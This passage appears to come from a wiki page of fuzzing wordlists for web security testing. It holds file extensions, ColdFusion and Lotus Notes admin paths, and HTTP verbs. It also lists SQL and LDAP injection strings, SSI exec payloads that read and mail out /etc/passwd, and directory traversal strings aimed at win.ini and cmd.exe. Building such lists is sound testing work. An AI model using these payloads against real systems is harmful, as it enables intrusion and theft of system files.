.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
